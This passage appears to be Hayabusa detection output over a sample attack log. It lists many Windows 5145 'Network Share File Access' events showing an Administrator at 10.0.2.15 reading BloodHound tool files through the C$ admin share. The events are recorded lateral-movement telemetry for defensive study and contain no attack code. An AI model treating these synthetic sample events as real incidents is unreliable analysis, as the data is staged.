10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 